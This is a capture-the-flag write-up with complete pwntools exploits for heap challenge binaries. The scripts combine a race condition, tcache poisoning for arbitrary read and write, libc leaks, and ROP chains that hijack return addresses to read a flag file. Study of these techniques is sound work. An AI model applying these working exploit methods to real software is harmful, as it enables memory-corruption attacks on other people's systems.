        r1.sendline(b"malloc 0 scanf 0 AAAAAAAABBBBBBBB free 0 "*10000)
        exit()
    r2.sendline(b"printf 0 "*10000)
    os.wait()
    time.sleep(0.01)
    output = r2.clean()
    r1.clean()
    leak = next(a for a in output.split() if b'\x7f' in a)[8:].ljust(8,b'\0')
    r1.sendline(b'malloc 0')
    return pwn.u64(leak)

perthread_leak = 0   
idx = 1
def controlled_allocation(r1, r2, addr):
    global idx
    global perthread_leak
    chunk_0_addr = perthread_leak + 0x650
        
    packed = pwn.p64( (chunk_0_addr>>12)^addr )
    r1.clean(),r2.clean()
    r1.sendline(f'malloc {idx}'.encode())
    r1.sendline(f'free {idx}'.encode())

    while True:
        #after pass scanf check -> free it -> then overwrite tcache next pointer
        if os.fork() == 0:
            r1.sendline(f'free 0'.encode())
            os.kill(os.getpid(), 9)
            
        r2.send((b'scanf 0 ' + packed + b'\n')*2000)
        os.wait()
        time.sleep(0.1)
        r1.sendline(b'malloc 0 printf 0')
        output = b''
        r1.recvuntil(b'MESSAGE: ')
        output = r1.recvline()[:-1]
        if output == packed.split(b'\0')[0]:
            print(b'OUTPUT: ' + output + b' PACKED: ', packed.split(b'\0'))
            break
    #malloc the controlled chunk
    r1.sendline(f'malloc {idx}'.encode())
    idx += 1
    
#support 8 bytes read
def arbitrary_read(r1, r2, addr, unalign=False):
    global idx
    if unalign:
        r1.sendline(b'malloc 10')
        arbitrary_write(r1, r2, binary_base+0x4040+0x8*10, addr)
        r1.sendline(b'printf 10')
    else:
        controlled_allocation(r1, r2, addr)
        r1.sendline(f'printf {idx-1}'.encode())
    r1.recvuntil(b'MESSAGE: ')
    output = r1.clean()
    print('MESSAGE IS: ', output)
    pwn.context.log_level = 'info'
    return output
    
#support digital write
def arbitrary_write(r1, r2, addr, value, unalign=False):
    global idx
    if unalign:
        r1.sendline(b'malloc 10')
        arbitrary_write(r1, r2, binary_base+message_offset+0x8*10, addr)
        if type(value[0]) == bytes:
            print('SCANF(bytes): ', value[0])
            r1.sendline(b'scanf 10 ' + value[0])
        elif type(value[0]) == int:
            print('SCANF(int): ', value[0])
            r1.sendline(b'scanf 10 ' + value[0].to_bytes(8, 'little'))
        return
    #end of `if unalign:`
    controlled_allocation(r1, r2, addr)
    r1.sendline(b'scanf %d '%(idx-1) + pwn.flat(value))

try:
    p.kill(),r1.close(),r2.close()
except Exception:
    pass
pwn.context.log_level='info'
pwn.context.binary = './toddlertwo_level7.0.elf64'
p=pwn.process("./toddlertwo_level7.0.elf64")
p.clean()
with open(f"/proc/{p.pid}/maps") as f:
    print(f.read())
r1 =pwn.remote("localhost",1337)
r2 =pwn.remote("localhost",1337)

message_offset = 0x4040
perthread_leak = leak_perthread_addr(r1,r2);
print("LEAKED: PERTHREAD: ", hex(perthread_leak))
main_arena_ptr_address = perthread_leak - 0x8d0 + 0x890
time.sleep(0.2)
main_arena_addr = pwn.u64(arbitrary_read(r1, r2, main_arena_ptr_address)[:-1].ljust(8, b'\0'))
print("MAIN ARENA ADDR: ", hex(main_arena_addr))
libc_base = main_arena_addr - 0x1bdba0
print('LIBC BASE: ', hex(libc_base))
stored_rip_addr = main_arena_addr - 0x1c1d78
print('STORED RIP ADDR: ', hex(stored_rip_addr))
#stored_rip = pwn.u64(arbitrary_read(r1, r2, stored_rip_addr, True)[:-1].ljust(8, b'\0'))
#print('STORED RIP: ', stored_rip)
binary_base = 0
with open(f"/proc/{p.pid}/maps") as f: 
    binary_base = int(f.read(12), 16)
print('BINARY BASE: ', hex(binary_base))

#ROLLING!!!!!!!!!!!!!!!!!!!
libc = p.libc
libc.address = libc_base
rop = pwn.ROP(libc, badchars=b"\x09\x0a\x0b\x0c\x0d\x0e\x20")
rop.call("close", [3]) # used for correctly execute sendfile.
rop.call("read", [0, libc.bss(0x123), 42])
rop.call("open", [libc.bss(0x123), 0])
rop.call("sendfile", [1, 3, 0, 1024])
rop.call("exit", [42])

arbitrary_write(r1, r2, stored_rip_addr, [rop.chain()], True)
r1.sendline(b"quit")
p.send(b"/flag\0")
print( "LEAKED:", p.readall())
print("EXITED: ", p.poll())
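The `badchars` argument passed to `pwn.ROP` above matters because the chain is delivered through the `scanf` command, and a string conversion stops at the first whitespace byte. A small checker like the following can catch a truncated chain before it is sent. It is a sketch: `find_badchars` is a made-up helper, and the assumption that the challenge reads with a `%s`-style conversion is mine.

```python
import struct

# Bytes that end a scanf string conversion: tab, LF, VT, FF, CR, space.
WHITESPACE = b"\x09\x0a\x0b\x0c\x0d\x20"

def find_badchars(payload, badchars=WHITESPACE):
    """Return (offset, byte) pairs for every forbidden byte in payload."""
    return [(i, b) for i, b in enumerate(payload) if b in badchars]

# Hypothetical gadget addresses packed as little-endian 64-bit words.
clean_word = struct.pack("<Q", 0x7F0000123456)
dirty_word = struct.pack("<Q", 0x7F0000002000)  # contains a 0x20 byte

print(find_badchars(clean_word))
print(find_badchars(dirty_word))
```

If the checker reports a hit, the usual options are picking a different gadget or writing the chain in several pieces so that no single write contains a forbidden byte.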

level8

Emmmm, I can't figure out the difference.

Ohhhh, it uses pthread_exit() instead of a normal return, so the ROP attack on the return address is no longer viable.

I could overwrite a return address in another thread instead, such as thread 3's scanf return address. It sits right on top of the challenge's stack frame, so it is at a constant offset from some address higher up.

The slot that holds thread 3's scanf return address is at a constant offset from stored_rip_addr (~~-0x801000~~ bytes).

Okay, fscanf has no push rbp in its prologue, so computing the distance between fscanf's frame and stored_rip_addr from rbp+8 is simply inaccurate. The actual address of its return address has to be checked on the stack in gdb.

~~pwntools is going crazy~~, I'm going crazy.

The read syscall with 0 as its first argument doesn't simply work the way I thought. Something strange happens when communicating with the main thread's stdin/stdout. Could the child thread be influenced by it?
Or should I try to compute the address of the TCP channel's fd (in TLS, addressed through the fs register)?

`mov rax, fs:0x28` loads the value stored at fs_base+0x28 into rax. There is no shifting or scaling.

The second method looks more feasible. Here it is (calculated from libc_base):

Okay, it's a stream pointer, not an fd. I got it wrong again.

~~When I stepped through fscanf, I found that it finally uses fd=6 to read the data in.~~

Fine, now I really grasp the principles. The first problem above was just a misunderstanding of how file descriptors, file streams, and threads relate.

In this program, the main thread uses accept() to take a socket connection and get back an fd. Then run_thread() uses fdopen() to turn the fd into a FILE* stream and writes this FILE pointer into thread-local storage (that is, fs-based addressing).
A FILE stream wraps a file descriptor: the stream is the high-level interface and the fd is the low-level one. Child threads use fscanf and fprintf to read from or write to the stream (and therefore the fd underneath it), while the process-wide stdin, stdout, and stderr are still usable in a child thread. So read(0, libc.bss(), 0x400) is correct.
One more thing to notice: before thread 3 returns from fscanf, part of the stack gets overwritten with the bytes I send in. So I additionally work out the address of a suitable pop rdi gadget and send it, so that the ROP chain still works.
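The relationship between a descriptor and a stream can be reproduced outside the challenge. The sketch below uses Python's `os.fdopen` as a stand-in for C's `fdopen()` (an analogy, not the challenge code): the stream is a buffered wrapper around the same fd, and another thread can read the raw descriptor directly because descriptors belong to the whole process.

```python
import os
import threading

def demo():
    read_fd, write_fd = os.pipe()

    # Wrap the low-level descriptor in a high-level buffered stream.
    stream = os.fdopen(write_fd, "wb")
    same_fd = stream.fileno() == write_fd

    # Data written to the stream reaches the fd once it is flushed.
    stream.write(b"/flag\0")
    stream.flush()

    # A different thread reads the raw descriptor.
    received = []
    worker = threading.Thread(target=lambda: received.append(os.read(read_fd, 6)))
    worker.start()
    worker.join()

    stream.close()      # also closes write_fd
    os.close(read_fd)
    return same_fd, received[0]

print(demo())
```

This mirrors why `read(0, ...)` inside the ROP chain can consume what the script sends with `p.send(b"/flag\0")`: fd 0 is the process's stdin regardless of which thread issues the syscall.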

exp:

import time
import pwn
import os
def leak_perthread_addr(r1,r2):
    if os.fork()==0:
        r1.sendline(b"malloc 0 scanf 0 AAAAAAAABBBBBBBB free 0 "*10000)
        exit()
    r2.sendline(b"printf 0 "*10000)
    os.wait()
    time.sleep(0.01)
    output = r2.clean()
    r1.clean()
    leak = next(a for a in output.split() if b'\x7f' in a)[8:].ljust(8,b'\0')
    #pwn.gdb.attach(p, 'init-pwndbg\n')
    #input('press enter to continue')
    r1.sendline(b'malloc 0')
    return pwn.u64(leak)

perthread_leak = 0   
idx = 1
def controlled_allocation(r1, r2, addr):
    global idx
    global perthread_leak
    chunk_0_addr = perthread_leak + 0x650
        
    packed = pwn.p64( (chunk_0_addr>>12)^addr )
    r1.clean(),r2.clean()
    r1.sendline(f'malloc {idx}'.encode())
    r1.sendline(f'free {idx}'.encode())

    while True:
        #after pass scanf check -> free it -> then overwrite tcache next pointer
        if os.fork() == 0:
            r1.sendline(f'free 0'.encode())
            os.kill(os.getpid(), 9)
            
        r2.send((b'scanf 0 ' + packed + b'\n')*2000)
        os.wait()
        time.sleep(0.1)
        r1.sendline(b'malloc 0 printf 0')
        output = b''
        r1.recvuntil(b'MESSAGE: ')
        output = r1.recvline()[:-1]
        if output == packed.split(b'\0')[0]:
            print(b'OUTPUT: ' + output + b' PACKED: ', packed.split(b'\0'))
            break
    #malloc the controlled chunk
    r1.sendline(f'malloc {idx}'.encode())
    idx += 1
    
#support 8 bytes read
def arbitrary_read(r1, r2, addr, unalign=False):
    global idx
    if unalign:
        r1.sendline(b'malloc 10')
        arbitrary_write(r1, r2, binary_base+0x4040+0x8*10, addr)
        r1.sendline(b'printf 10')
    else:
        controlled_allocation(r1, r2, addr)
        r1.sendline(f'printf {idx-1}'.encode())
    r1.recvuntil(b'MESSAGE: ')
    output = r1.clean()
    print('MESSAGE IS: ', output)
    pwn.context.log_level = 'info'
    return output
    
#support digital write
def arbitrary_write(r1, r2, addr, value, unalign=False):
    global idx
    if unalign:
        r1.sendline(b'malloc 10')
        arbitrary_write(r1, r2, binary_base+0x4040+0x8*10, addr)
        if type(value[0]) == bytes:
            print('SCANF(bytes): ', value[0])
            r1.sendline(b'scanf 10 ' + value[0])
            print('PROCESS POLL: ', p.poll())
        else:
            print('SCANF(int): ', value[0])
            r1.sendline(b'scanf 10 ' + value[0].to_bytes(8, 'little'))
        return
    controlled_allocation(r1, r2, addr)
    r1.sendline(b'scanf %d '%(idx-1) + pwn.flat(value))

try:
    p.kill(),r1.close(),r2.close()
except Exception:
    pass
pwn.context.log_level='info'
pwn.context.binary = './toddlertwo_level8.0.elf64'
p=pwn.process("./toddlertwo_level8.0.elf64")
p.clean()
with open(f"/proc/{p.pid}/maps") as f:
    print(f.read())
r1 =pwn.remote("localhost",1337)
r2 =pwn.remote("localhost",1337)

perthread_leak = leak_perthread_addr(r1,r2);
print("LEAKED: PERTHREAD: ", hex(perthread_leak))
main_arena_ptr_address = perthread_leak - 0x8d0 + 0x890
time.sleep(0.2)
main_arena_addr = pwn.u64(arbitrary_read(r1, r2, main_arena_ptr_address)[:-1].ljust(8, b'\0'))
print("MAIN ARENA ADDR: ", hex(main_arena_addr))
libc_base = main_arena_addr - 0x1bdba0
if libc_base >  0:
    print('LIBC BASE: ', hex(libc_base))
    stored_rip_addr = main_arena_addr - 0x1c1d78
    print('STORED RIP ADDR: ', hex(stored_rip_addr))
    #stored_rip = pwn.u64(arbitrary_read(r1, r2, stored_rip_addr, True)[:-1].ljust(8, b'\0'))
    #print('STORED RIP: ', stored_rip)
    binary_base = 0
    with open(f"/proc/{p.pid}/maps") as f: 
        binary_base = int(f.read(12), 16)
    print('BINARY BASE: ', hex(binary_base))

    libc = p.libc
    libc.address = libc_base
    rop = pwn.ROP(libc, badchars=b"\x09\x0a\x0b\x0c\x0d\x20")
    rop.call("close", [3]) # used for correctly execute sendfile.
    rop.call("read", [0, libc.bss(0x123), 42])
    rop.call("open", [libc.bss(0x123), 0])
    rop.call("sendfile", [1, 3, 0, 1024])
    rop.call("exit", [42])

    thread3_scanf_return_saveaddress = stored_rip_addr - 0x801460
    #pwn.gdb.attach(p, 'init-pwndbg\nb __isoc99_fscanf\nc\nsp\nthr 3\n')
    #input("press enter to continue")
    arbitrary_write(r1, r2, thread3_scanf_return_saveaddress , [rop.chain()], True)
    #pwn.gdb.attach(p, 'init-pwndbg\nb *__isoc99_fscanf+176\nc\nsp\nthr 3\n')
    #input('press enter to continue')
    r2.sendline(pwn.p64(libc_base+0x27C2D))
    p.send(b"/flag\0")
    print("LEAKED:", p.clean())
else:
    print("FAILED!!!!!")

level9

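This has to point to the address at location 2, that is, bss+0x10.
From here on, return addresses are popped from the modified rsp. Start preparing to leak the libc address via puts.
After this, the address of puts has to be received.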
